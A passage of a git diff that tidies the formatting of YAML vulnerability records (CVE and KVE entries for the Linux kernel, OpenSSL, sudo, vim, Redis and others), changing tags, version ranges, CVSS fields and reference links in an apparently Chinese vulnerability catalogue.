https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2022-36946 + cwe-id: None + cnvd-id: None + kve-id: None + tags: 拒绝服务, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml index e55940934eafd458fb9be053f0e8a5fb97569abd..a7ecbb14b73099e34fbedbc7cddc4ede7512905a 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml @@ -6,11 +6,11 @@ info: description: | 在5.19.10之前的Linux内核中的drivers/media/dvb-core/dmxdev.c中,存在由refcount竞争导致的释放后使用,影响dvb_demux_open和dvb_dmxdev_release。 scope-of-influence: - Linux内核5.19.10之前的所有版本 + Linux-Kernel < 5.19.10 reference: - https://nvd.nist.gov/vuln/detail/cve-2022-41218 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H cvss-score: 5.5 cve-id: CVE-2022-41218 cwe-id: CWE-416 diff --git a/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml b/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml index 0779d866b767349924a1850b27bca898031b6fee..b4a6237a8d5635968b359a1613d9b3dc5963d17d 100644 --- a/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml +++ b/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml @@ -2,17 +2,18 @@ id: CVE-2023-0045 source: https://github.com/es0j/CVE-2023-0045 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 超危 + severity: High description: Linux kernel存在安全漏洞,该漏洞源于绕过Spectre-BTI用户空间缓解措施。基于linux操作系统的Intel、AMD和 Arm 等现代处理器,被发现存在一个漏洞,攻击者可以绕过现有硬件防护缓解措施,实施Spectre BTI推测执行攻击,从而访问内存数据,可能引起信息泄漏。用于推测控制的prctl系统调用的当前实现未能保护用户免受在缓解之前执行的攻击者的攻击。seccomp缓解在此场景中也失败了。 scope-of-influence: - 5.5~5.15 + 5.5 ≤ Linux-Kernel ≤ 5.15 reference: - - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2023-0179 - - https://docs.kernel.org/userspace-api/spec_ctrl.html - - https://elixir.bootlin.com/linux/v5.15.56/source/arch/x86/kernel/cpu/bugs.c#L1467 + - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2023-0045 + - https://nvd.nist.gov/vuln/detail/CVE-2023-0045 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2023-0045 - cwe-id: - tags: 推测攻击,信息泄露,cve2023 \ No newline at end of file + cwe-id: CWE-610 + cnvd-id: None + kve-id: None + tags: 推测攻击, 信息泄露, cve2023 \ No newline at end of file diff --git a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml index 74ca113bb0cb1849ee5b28fd2b0ce967274569d1..33387ea2e297dc983df7c75f092765abe465c946 100644 --- a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml +++ b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml @@ -19,5 +19,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2023-0179 - cnvd-id: NONE - tags: 缓冲区溢出,cve2023 \ No newline at end of file + cwe-id: CWE-190 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出, cve2023 \ No newline at end of file diff --git a/cve/openssl/2016/yaml/CVE-2016-2107.yaml b/cve/openssl/2016/yaml/CVE-2016-2107.yaml index 0d605e2471087c699686dec804b634c46cfa8f7c..b231edef03b7dffa1a591afb29d4724c1ba6df21 100644 --- a/cve/openssl/2016/yaml/CVE-2016-2107.yaml +++ b/cve/openssl/2016/yaml/CVE-2016-2107.yaml @@ -1,6 +1,5 @@ id: CVE-2016-2107 -source: - https://github.com/FiloSottile/CVE-2016-2107 +source: https://github.com/FiloSottile/CVE-2016-2107 info: name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 severity: medium diff --git a/cve/openssl/2021/yaml/CVE-2021-3449.yaml b/cve/openssl/2021/yaml/CVE-2021-3449.yaml index 5e064af31b089ae7dd507fb0981953c183676bf3..cd047c804a2ac82588d7f02148df457d62f17c55 100644 --- a/cve/openssl/2021/yaml/CVE-2021-3449.yaml +++ b/cve/openssl/2021/yaml/CVE-2021-3449.yaml @@ -1,6 +1,5 @@ id: CVE-2021-3449 -source: - https://github.com/terorie/cve-2021-3449 +source: https://github.com/terorie/cve-2021-3449 info: name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 severity: medium diff --git a/cve/openssl/2022/yaml/CVE-2022-0778.yaml b/cve/openssl/2022/yaml/CVE-2022-0778.yaml index b571f37cd324800e25bed4ca326626b6313d28bc..9f209b49ab23f23af0622fa7aa6c5c175afa5faf 100644 --- a/cve/openssl/2022/yaml/CVE-2022-0778.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-0778.yaml @@ -4,11 +4,12 @@ info: name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 severity: High description: 漏洞出自BN_mod_sqrt()接口函数,它用于计算模平方根,且期望参数p应该是个质数,但是函数内并没有进行检查,这导致内部可能出现无限循环。 - scope-of-influence: Openssl 1.0.2, 1.1.1 和 3.0 版本 + scope-of-influence: + Openssl 1.0.2, 1.1.1 和 3.0 版本 reference: - https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2022-0778 cwe-id: CWE-835 diff --git a/cve/openssl/2022/yaml/CVE-2022-2274.yaml b/cve/openssl/2022/yaml/CVE-2022-2274.yaml index 5e366ebe4d4f3bc0545b81763e37af1d4e8a3b5e..973b492c3fc45167b2da32669b6ff264781fb897 100644 --- a/cve/openssl/2022/yaml/CVE-2022-2274.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-2274.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-787 cnvd-id: None kve-id: None - tags: 拒绝服务,DoS,cve2022,RCE,远程代码执行 \ No newline at end of file + tags: 拒绝服务, DoS, cve2022, RCE, 远程代码执行 \ No newline at end of file diff --git a/cve/openssl/2022/yaml/CVE-2022-3602.yaml b/cve/openssl/2022/yaml/CVE-2022-3602.yaml index 90d08abac7afc118849ac465e875ece9feee193f..73bcf17581a330376d3979f3969ac6266cf93db3 100644 --- a/cve/openssl/2022/yaml/CVE-2022-3602.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-3602.yaml @@ -24,4 +24,4 @@ info: cwe-id: CWE-120 cnvd-id: None kve-id: None - tags: 缓存溢出,BOF,拒绝服务,DoS,cve2022,RCE,远程代码执行 \ No newline at end of file + tags: 缓存溢出, BOF, 拒绝服务, DoS, cve2022, RCE, 远程代码执行 \ No newline at end of file diff --git a/cve/openssl/2023/yaml/CVE-2023-25136.yaml b/cve/openssl/2023/yaml/CVE-2023-25136.yaml index 6879369c56f73dec52a6110fe3693e18d2fe0d91..ef5b23372ee25a83018adc5adc2465306877098f 100644 --- a/cve/openssl/2023/yaml/CVE-2023-25136.yaml +++ b/cve/openssl/2023/yaml/CVE-2023-25136.yaml @@ -18,4 +18,4 @@ info: cwe-id: CWE-415 cnvd-id: None kve-id: None - tags: 拒绝服务,DoS \ No newline at end of file + tags: 拒绝服务, DoS \ No newline at end of file diff --git a/cve/polkit/2021/yaml/CVE-2021-3560.yaml b/cve/polkit/2021/yaml/CVE-2021-3560.yaml index d378eb64af9819bc466d13f47b1f5a1465a3fcbe..e0ad57ec0b0c15bb560f67fd4fdcb050b3a18659 100644 --- a/cve/polkit/2021/yaml/CVE-2021-3560.yaml +++ b/cve/polkit/2021/yaml/CVE-2021-3560.yaml @@ -6,7 +6,7 @@ info: description: | 发现polkit可能被欺骗,绕过D-Bus请求的凭据检查,将请求者的权限提升到root用户。 scope-of-influence: - 0.105 ≥ policykit ≥ 0.113 + 0.105 ≤ policykit ≤ 0.113 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3560 - https://ubuntu.com/security/CVE-2021-3560 @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-3560 - cwe-id: CWE-754,CWE-863 + cwe-id: CWE-754, CWE-863 cnvd-id: None kve-id: None - tags: cve2021,权限提升 \ No newline at end of file + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/polkit/2021/yaml/CVE-2021-4034.yaml b/cve/polkit/2021/yaml/CVE-2021-4034.yaml index 9322d0459429d0fc4118deb39f831d297ea21a2b..9cbe6b9a4d6a4058d44b45e672e6cef4c8fe5ac2 100644 --- a/cve/polkit/2021/yaml/CVE-2021-4034.yaml +++ b/cve/polkit/2021/yaml/CVE-2021-4034.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-4034 - cwe-id: CWE-787,CWE-125 + cwe-id: CWE-787, CWE-125 cnvd-id: None kve-id: None - tags: cve2021,权限提升 \ No newline at end of file + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/python/2022/yaml/CVE-2022-30286.yaml b/cve/python/2022/yaml/CVE-2022-30286.yaml index 613b500754c4f138a4a7b16d780e36ff81d5d896..c76e9e0720d667828a31bbbde04332b7d8b402c7 100644 --- a/cve/python/2022/yaml/CVE-2022-30286.yaml +++ b/cve/python/2022/yaml/CVE-2022-30286.yaml @@ -20,5 +20,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: - - Source Codes Read \ No newline at end of file + tags: Source Codes Read \ No newline at end of file diff --git a/cve/python/2022/yaml/CVE-2022-35411.yaml b/cve/python/2022/yaml/CVE-2022-35411.yaml index 3e14c1845a5b10663053b181af3d4ab6fcab2b4e..3ac5318159648389b925686432f584802726bb42 100644 --- a/cve/python/2022/yaml/CVE-2022-35411.yaml +++ b/cve/python/2022/yaml/CVE-2022-35411.yaml @@ -18,5 +18,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: - - 远程代码执行 + tags: 远程代码执行 diff --git a/cve/redis/2022/yaml/CVE-2022-0543.yaml b/cve/redis/2022/yaml/CVE-2022-0543.yaml index 7a93478e1747dad11c6b8523b8c8d811c2633258..15056d48a0e02d5884fa87f8e516bc7bedaff112 100644 --- a/cve/redis/2022/yaml/CVE-2022-0543.yaml +++ b/cve/redis/2022/yaml/CVE-2022-0543.yaml @@ -1,6 +1,5 @@ id: CVE-2022-0543 -source: - https://github.com/aodsec/CVE-2022-0543 +source: https://github.com/aodsec/CVE-2022-0543 info: name: Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 severity: critical @@ -20,4 +19,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: cve2022,redis,RCE \ No newline at end of file + tags: cve2022, redis, RCE \ No newline at end of file diff --git a/cve/redis/2022/yaml/CVE-2022-31144.yaml b/cve/redis/2022/yaml/CVE-2022-31144.yaml index 7b5dcafb09241e93300148bc8eebd76245c3bdd1..13ff43a8e30f466b1700f2f21fba7bbf9caeff62 100644 --- a/cve/redis/2022/yaml/CVE-2022-31144.yaml +++ b/cve/redis/2022/yaml/CVE-2022-31144.yaml @@ -1,6 +1,5 @@ id: CVE-2022-31144 -source: - https://github.com/SpiralBL0CK/CVE-2022-31144 +source: https://github.com/SpiralBL0CK/CVE-2022-31144 info: name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力. severity: High diff --git a/cve/samba/2021/yaml/CVE-2021-44142.yaml b/cve/samba/2021/yaml/CVE-2021-44142.yaml index bcce0569a61c3a2833837e8d508a4e104e3d70c5..f6160dc9829b81b339e26a122f37f6ac977e1ba5 100644 --- a/cve/samba/2021/yaml/CVE-2021-44142.yaml +++ b/cve/samba/2021/yaml/CVE-2021-44142.yaml @@ -1,6 +1,5 @@ id: CVE-2021-44142 -source: - https://github.com/horizon3ai/CVE-2021-44142 +source: https://github.com/horizon3ai/CVE-2021-44142 info: name: Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。 severity: high @@ -20,4 +19,4 @@ info: cwe-id: CWE-125,CWE-787 cnvd-id: None kve-id: None - tags: cve2021,samba,RCE \ No newline at end of file + tags: cve2021, samba, RCE \ No newline at end of file diff --git a/cve/sudo/2021/yaml/CVE-2021-3156.yaml b/cve/sudo/2021/yaml/CVE-2021-3156.yaml index 5782b43067351fdb186e305dc72697488ff67639..760104ccc7745304ea7648969d5d0cc558e77a02 100644 --- a/cve/sudo/2021/yaml/CVE-2021-3156.yaml +++ b/cve/sudo/2021/yaml/CVE-2021-3156.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-193 cnvd-id: None kve-id: None - tags: 堆缓冲区溢出漏洞,cve2021,权限提升 \ No newline at end of file + tags: 堆缓冲区溢出漏洞, cve2021, 权限提升 \ No newline at end of file diff --git a/cve/sudo/2023/yaml/CVE-2023-22809.yaml b/cve/sudo/2023/yaml/CVE-2023-22809.yaml index 8fad732065c69fbaf8d90d4aa442ae726ecbd7c2..66b6045a82c2ab26c5cc97c38e34d538f71322b7 100644 --- a/cve/sudo/2023/yaml/CVE-2023-22809.yaml +++ b/cve/sudo/2023/yaml/CVE-2023-22809.yaml @@ -1,20 +1,19 @@ id: CVE-2023-22809 source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc info: - name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 - severity: high - description: - Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 - scope-of-influence: - sudo@[1.8.0, 1.9.12p2) - references: - - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2023-22809 - cwe-id: CWE-269 - cnvd-id: None - kve-id: None - tags: - - 特权管理不当 \ No newline at end of file + name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 + severity: high + description: + Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 + scope-of-influence: + sudo@[1.8.0, 1.9.12p2) + references: + - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-22809 + cwe-id: CWE-269 + cnvd-id: None + kve-id: None + tags: 特权管理不当 \ No newline at end of file diff --git a/cve/vim/2021/yaml/CVE-2021-3778.yaml b/cve/vim/2021/yaml/CVE-2021-3778.yaml index a009ea6b6928d8ffc4d92ad40c52ee8e141c520a..e99dcced77673670d40eba48e743d218df82ba96 100644 --- a/cve/vim/2021/yaml/CVE-2021-3778.yaml +++ b/cve/vim/2021/yaml/CVE-2021-3778.yaml @@ -2,8 +2,7 @@ id: CVE-2021-3778 source: https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/ info: name: vim: Heap-based Buffer Overflow in ex_retab() - severity: - HIGH + severity: HIGH description: | vim容易受到基于堆的缓冲区溢出的攻击 scope-of-influence: diff --git a/cve/vim/2022/yaml/CVE-2022-0351.yaml b/cve/vim/2022/yaml/CVE-2022-0351.yaml index 151afb15b1d2a449b3caef6df286e9da64dd68fb..a7dab599db3816d7542d01e5a5c957ccfa97da7b 100644 --- a/cve/vim/2022/yaml/CVE-2022-0351.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0351.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0351 - cwe-id: CWE-119,CWE-786 + cwe-id: CWE-119, CWE-786 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误,拒绝服务 \ No newline at end of file + tags: cve2022, 缓冲区错误, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0359.yaml b/cve/vim/2022/yaml/CVE-2022-0359.yaml index 63ba211001dc9173e3a41d950b49233f2913d6dc..2bab72a5c945fca0a8864f534e577870374a4e1f 100644 --- a/cve/vim/2022/yaml/CVE-2022-0359.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0359.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0359 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: 缓冲区溢出,cve2022 \ No newline at end of file + tags: 缓冲区溢出, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0413.yaml b/cve/vim/2022/yaml/CVE-2022-0413.yaml index 6768e9a9941d0463206adeae3d6dda88a3208982..e4ba32a11cd6f1324da75c529d6d92e920a6de9c 100644 --- a/cve/vim/2022/yaml/CVE-2022-0413.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0413.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-416 cnvd-id: None kve-id: None - tags: cve2022,资源管理错误,拒绝服务 \ No newline at end of file + tags: cve2022, 资源管理错误, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0417.yaml b/cve/vim/2022/yaml/CVE-2022-0417.yaml index 30adb1b706450e3f12fa96b46a13062ae2e4bbb8..ea15ffe17ef37eb8b94601c89391451fbe430039 100644 --- a/cve/vim/2022/yaml/CVE-2022-0417.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0417.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0417 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: 崩溃,代码执行,cve2022 \ No newline at end of file + tags: 崩溃, 代码执行, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0572.yaml b/cve/vim/2022/yaml/CVE-2022-0572.yaml index 3c4f1c9ee5a3784b8feb4ba751c8c6184a5d194a..be2a63876728db00f2b05441db99a0b69ff4f7d0 100644 --- a/cve/vim/2022/yaml/CVE-2022-0572.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0572.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0572 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: 缓冲区错误,cve2022 \ No newline at end of file + tags: 缓冲区错误, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0629.yaml b/cve/vim/2022/yaml/CVE-2022-0629.yaml index 3802cc7d17111b99b5dfc0f0d47736bffc7fe8ac..a06f09e802c4e5a8120795731161265315c67107 100644 --- a/cve/vim/2022/yaml/CVE-2022-0629.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0629.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0629 - cwe-id: CWE-787,CWE-121 + cwe-id: CWE-787, CWE-121 cnvd-id: None kve-id: None - tags: 缓冲区溢出,cve2022 \ No newline at end of file + tags: 缓冲区溢出, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0685.yaml b/cve/vim/2022/yaml/CVE-2022-0685.yaml index b04e2848da565885f4d0df16956b65f9e9dd88ec..3dda6837ff797a66369a55b164a50a59f7982bb1 100644 --- a/cve/vim/2022/yaml/CVE-2022-0685.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0685.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-823 cnvd-id: None kve-id: None - tags: cve2022,拒绝服务 \ No newline at end of file + tags: cve2022, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0714.yaml b/cve/vim/2022/yaml/CVE-2022-0714.yaml index b9f11b5fb02f6d77e153757919e621fef4ccc495..8c7ea56f2f64f74567462095c47516804e38fe60 100644 --- a/cve/vim/2022/yaml/CVE-2022-0714.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0714.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H cvss-score: 5.5 cve-id: CVE-2022-0714 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误 \ No newline at end of file + tags: cve2022, 缓冲区错误 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0729.yaml b/cve/vim/2022/yaml/CVE-2022-0729.yaml index e55f8edc1349c57da9e5517e30d573006b747be3..6b6c5a0cf6f92ecd0c1e47102d899e268fc763b4 100644 --- a/cve/vim/2022/yaml/CVE-2022-0729.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0729.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0729 - cwe-id: CWE-119,CWE-823 + cwe-id: CWE-119, CWE-823 cnvd-id: None kve-id: None - tags: 缓冲区溢出,cve2022 \ No newline at end of file + tags: 缓冲区溢出, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-1771.yaml b/cve/vim/2022/yaml/CVE-2022-1771.yaml index a82ca61e6a59816b0de4ecd0aea494902c607fa4..b5bfc8733ab1f691f7416c0099d3eb908193c17f 100644 --- a/cve/vim/2022/yaml/CVE-2022-1771.yaml +++ b/cve/vim/2022/yaml/CVE-2022-1771.yaml @@ -11,9 +11,9 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-1771 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H - cvss-score: 漏洞评分 + cvss-score: 5.5 cve-id: CVE-2022-1771 cwe-id: CWE-674 cnvd-id: None kve-id: None - tags: cve2022,缓冲区溢出 \ No newline at end of file + tags: cve2022, 缓冲区溢出 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2206.yaml b/cve/vim/2022/yaml/CVE-2022-2206.yaml index 47f8d6b0afe8a988ba8568efe0766a0825213034..387d0d77d84cec4f6236510f0f7a06e5060a4109 100644 --- a/cve/vim/2022/yaml/CVE-2022-2206.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2206.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-125 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误 \ No newline at end of file + tags: cve2022, 缓冲区错误 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2257.yaml b/cve/vim/2022/yaml/CVE-2022-2257.yaml index 7b71e39ad9ba88668bff9c2457174792714a86b9..7e823bc2c5cab47871f2fe162fcadee553f17230 100644 --- a/cve/vim/2022/yaml/CVE-2022-2257.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2257.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-125 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误 \ No newline at end of file + tags: cve2022, 缓冲区错误 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2264.yaml b/cve/vim/2022/yaml/CVE-2022-2264.yaml index 9df97e7af1f079e4c07b69b7e6d9d5872d0f9de8..0c326cacaca17681f8ddbbf7315ef3f9d30c2aa5 100644 --- a/cve/vim/2022/yaml/CVE-2022-2264.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2264.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-122 cnvd-id: None kve-id: None - tags: cve2022,缓冲区溢出 \ No newline at end of file + tags: cve2022, 缓冲区溢出 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2598.yaml b/cve/vim/2022/yaml/CVE-2022-2598.yaml index 93a97db39991e17e2b969886ba593746e78dcccd..cdd674e8e539afb48ddf477736a60be4bde32bf7 100644 --- a/cve/vim/2022/yaml/CVE-2022-2598.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2598.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-475 cnvd-id: None kve-id: None - tags: cve2022,拒绝服务 \ No newline at end of file + tags: cve2022, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-1127.yaml b/cve/vim/2023/yaml/CVE-2023-1127.yaml index cd88a16b50cef9d434f59218966e7737df1a1fe5..cb16afedb71a54d6e09250c1278369e188c8841c 100644 --- a/cve/vim/2023/yaml/CVE-2023-1127.yaml +++ b/cve/vim/2023/yaml/CVE-2023-1127.yaml @@ -4,7 +4,7 @@ info: name: Vim是一款基于UNIX平台的编辑器。 severity: high description: | - GitHub存储库vim/vim在9.0.1367版本存在除以零漏洞。 + vim在9.0.1367版本存在除以零漏洞。 scope-of-influence: vim < 9.0.1367 reference: diff --git a/cve/webmin/2019/yaml/CVE-2019-12840.yaml b/cve/webmin/2019/yaml/CVE-2019-12840.yaml index 1112f170b607c15cf3044a62ddd9e8e4d7085ea3..3eddcac3ba9fe575138dfd2846a4d688df89669e 100644 --- a/cve/webmin/2019/yaml/CVE-2019-12840.yaml +++ b/cve/webmin/2019/yaml/CVE-2019-12840.yaml @@ -10,7 +10,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-12840 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-12840 cwe-id: CWE-78 diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml index 0eab256c4dfe862200d680cff85dda2a1537ef4e..1a2157230b101f278f6fb5e029aeff9993fa8024 100644 --- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml +++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml @@ -1,6 +1,5 @@ id: CVE-2022-23131 -source: - https://github.com/L0ading-x/cve-2022-23131 +source: https://github.com/L0ading-x/cve-2022-23131 info: name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 severity: critical diff --git a/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml b/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml index 8101adfa65637945d894c69be075d12ec0a33598..b4bed45fbafc5e80b9dff034d66151c36e9bc38e 100644 --- a/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml +++ b/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml @@ -17,4 +17,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0231 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml b/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml index d3512bf6a909a4788e1c9a029d3f462b28320f65..9a2e69d5ff88f8ab4b724607f5226241a8f430a1 100644 --- a/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml 